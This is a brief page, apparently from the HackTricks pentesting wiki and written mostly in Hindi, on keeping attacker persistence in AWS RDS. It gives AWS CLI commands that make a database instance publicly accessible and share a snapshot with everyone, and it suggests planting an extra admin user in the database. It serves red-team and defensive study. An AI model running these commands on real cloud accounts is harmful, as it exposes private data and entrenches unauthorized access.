AWS - RDS Persistence

Support HackTricks

RDS

अधिक जानकारी के लिए देखें:

AWS - Relational Database (RDS) Enum

Make instance publicly accessible: rds:ModifyDBInstance

इस अनुमति के साथ एक हमलावर एक मौजूदा RDS इंस्टेंस को सार्वजनिक पहुंच सक्षम करने के लिए संशोधित कर सकता है

aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately

DB के अंदर एक एडमिन यूजर बनाएं

एक हमलावर बस DB के अंदर एक यूजर बना सकता है ताकि अगर मास्टर यूजर का पासवर्ड बदल दिया जाए तो भी वह डेटाबेस तक पहुंच नहीं खोता

स्नैपशॉट को सार्वजनिक बनाएं

aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
HackTricks का समर्थन करें

Last updated